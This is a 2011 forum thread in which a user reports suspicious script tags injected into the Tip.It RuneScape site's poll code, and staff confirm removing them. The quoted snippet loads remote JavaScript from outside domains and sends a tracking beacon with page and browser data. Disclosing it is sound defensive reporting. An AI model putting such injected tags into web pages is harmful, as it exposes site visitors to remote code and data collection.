D. V. Devnull Posted June 20, 2011 Share Posted June 20, 2011 (edited) Hello, Tip.It Crewbies... Read below, I've got some bad news for you... :( While heading to visit the Tip.It Front Page this morning, I ran into some cookies (which I denied manually) that shouldn't have shown up from "tongji.linezing.com"... I then checked my ABP list, and discovered multiple entries that shouldn't even be there. Very quickly, I flew to my "View Source" command, and found the following in the page... <script src="http://www.dual-boxing.com/clientscript/yui/animation/js.php" type="text/javascript"></script> <script type="text/javascript" src="http://js.tongji.linezing.com/2494801/tongji.js"></script> <img src="http://dt.tongji.linezing.com/tongji.do?unit_id=2494801&uv_id=19015599273809678862& uv_new=0&cna=&cg=&mid=&mmland=&ade=&adtm=&sttm=&cpa=&ss_id=1445423839&ss_no=6&ec=1& ref=http%3A//tip.it/runescape/%3Ftimes%3Dall&url=http%3A//tip.it/runescape/%3Ftimes%3D626& title=Tip.it%20RuneScape%20Help%20%3A%3A%20Tip.It%20Times%20%3A%3A%20 The%20Original%20RuneScape%20help%20site%21&charset=undefined&domain=tip.it& hashval=600&filtered=0&app=Netscape&agent=Mozilla/5.0%20%28Windows%3B%20U%3B %20Windows%20NT%205.1%3B%20en-US%3B%20rv%3A1.8.1.6%29%20Gecko/20070725 %20Firefox/2.0.0.6&color=32-bit&screen=1024x768&lg=en-us&je=1&fv=10.0%20r42& st=1308582258&vc=b9c1ad14&ut=0&url_id=0&cnu=0.9868762751287229" border="0" height="1" width="1"><noscript> <img src="http://img.tongji.linezing.com/2494801/tongji.gif"/></noscript>[Edit: Had to manually hand-chop this so it could display easily...] ...which was hiding amongst the page code for the Website Poll. Immediately upon seeing this, I then launched google searches on the domains in that snippet of page source that I saw. Now, it's not just bad enough that site who the cookies came from is all chinese, which makes it impossible to read. But, "js.tongji.linezing.com" is on the "ISC Diary | IE 0day exploit domains" listing, marking it as being potentially hazardous to computers to have anything load from it. You need to get that junk torn out of the website pages, and fast, before someone gets hit. :huh: As for me, I'm just glad I haven't been hit, and I've already placed ABP blocks against them so I won't in the future. (Firefox FTW, eh?) But I don't want anyone else falling victim, so that's why you're seeing this now. Please fix it quickly? :? ~Mr. D. V. "I shouldn't be seeing potentially dangerous junk in Tip.It's pages, right?!?!?" Devnull (p.s.: BTW, that was a VERY nice poll that you chose to put up there today. Already placed my vote this morning as well.) Edited June 20, 2011 by D_V_Devnull and normally with a cool mind.(Warning: This user can be VERY confusing to some people... And talks in 3rd person for the timebeing due to how insane they are... Sometimes even to themself.) Link to comment Share on other sites More sharing options...
obfuscator Posted June 20, 2011 Share Posted June 20, 2011 Do you run adblock on the main site? (prior to adding that url to the list) "It's not a rest for me, it's a rest for the weights." - Dom Mazzetti Link to comment Share on other sites More sharing options...
Tecmaster Posted June 20, 2011 Share Posted June 20, 2011 This is being dealt with, thanks for alerting us to it. We've removed the exploit code from the site and are currently investigating the whole situation. The site is safe to use however. :) Owner of the Quest Point Cape Link to comment Share on other sites More sharing options...
MageUK Posted June 24, 2011 Share Posted June 24, 2011 This issue has now been resolved. :) Link to comment Share on other sites More sharing options...
Recommended Posts